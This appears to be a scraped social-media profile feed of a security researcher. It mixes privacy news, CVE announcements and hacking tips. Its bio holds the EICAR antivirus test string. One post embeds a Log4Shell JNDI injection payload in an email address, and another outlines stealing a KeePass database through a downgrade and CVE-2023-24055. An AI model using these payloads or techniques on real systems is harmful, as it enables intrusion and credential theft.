Infosec @ random
@infosecatrandom
Tor operator, privacy advocate, security geek. Also: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Just a month later and... 🇪🇺 ChatControl is back! Now they're trying to pass an even more far-reaching ChatControl law through the back door, in a form even more intrusive than the originally rejected plan, without needing any of the EU countries' votes. The new proposal: -…
Read our latest crazy story on the spy who was so successful at pretending he's someone else that the GRU "killed off" his real persona and stranded him with the fake one. Once a fake environmental expert, now he's part of the Russia disinformation machine theins.ru/en/inv/286477
💥 Wiz Research has uncovered a critical Redis vulnerability that's been hiding for 13 years We found RediShell (CVE-2025-49844): an RCE bug in Redis that affects every version of Redis out there. It's rated CVSS 10 - the highest severity possible. The vulnerability lets…
Until now, if you lost or broke your phone, your Signal message history was *gone,* a real challenge for everyone whose most important conversations happen in Signal. So, with careful design and development, we’re rolling out opt-in secure backups. signal.org/blog/introduci……
TIL that some ipcams that can be found on shodan allow scanning for wifi access points without authentication ....
Russia’s Most Secretive FSB’s Spy Network Unmasked by Souvenir Badges Sold Online — UNITED24 Media united24media.com/latest-news/ru…
I've discovered via code review: 2 zero-click RCE logic bugs in Linux kernel Bluetooth & userspace (late 2024). Exploitable to register rogue HID w/o auth. One allows bonding w/o confirmation, bypassing CVE-2023-45866 @marcnewlin patch. Details: ubuntu.com/security/CVE-2…
Run a Linux virtual machine in your browser, no server needed
🧵 THREAD: A federal whistleblower just dropped one of the most disturbing cybersecurity disclosures I’ve ever read. He's saying DOGE came in, data went out, and Russians started attempting logins with new valid DOGE passwords Media's coverage wasn't detailed enough so I dug…
T3S3 adds LoRa Voice Communication Kit lilygo.cc/products/t3-s3…
The ESP32 “backdoor” mentioned in the article from Bleepingcomputer is another Nothingburger. Rob is correct.
It's not a "backdoor". It's just low-level access to the device.
Microsoft just released an impressive tool OmniParser V2 can turn any LLM into an agent capable of using a computer 🔥 You can enable GPT-4o, DeepSeek R1, Sonnet 3.5, Qwen... to understand what's on your screen and take actions. 100% free & open source
This has been one of my favorites for a while, but now it's time to let it go. Here's my preferred way of getting the KeePass db that we often hunt for: downgrade the executable to version 2.53, use CVE-2023-24055 and wait for the busy admin to trigger the dump of the database.…
This is awesome: wrap @cloudflare around your site & they can now automatically hit @haveibeenpwned's Pwned Passwords during a login attempt, check it against our DB (among others) and pass a request header to the origin if the password has been breached blog.cloudflare.com/a-safer-intern…
#GSM security: A5/4 was approved by 3GPP together with A5/3 (2009), but most vendors were lazy to change from 64 to 128bit keys on both UE and network side. A5/2 and A5/1 lessons were not enough to prevent history repeating: iacr.org/cryptodb/data/… iacr.org/submit/files/s…
🚀 Introducing getpiped.py: Your ultimate tool for testing curl/wget piping scenarios! 🌐💻 🔍 Explore a variety of script execution methods: curl/wget | bash 📜🔧 Process substitution 🔄 Here-strings 📥 Temporary files 📝 Base64 encoding 🔑 Compressed data 📦 Run…
For educational purposes only: test+(${jndi:ldap://test/a})@gmail.com is a valid RFC822 Email Address 😅
Stop what you're doing and read this. This leak is going to be the story of the year: (LINK: theguardian.com/world/2021/jul…)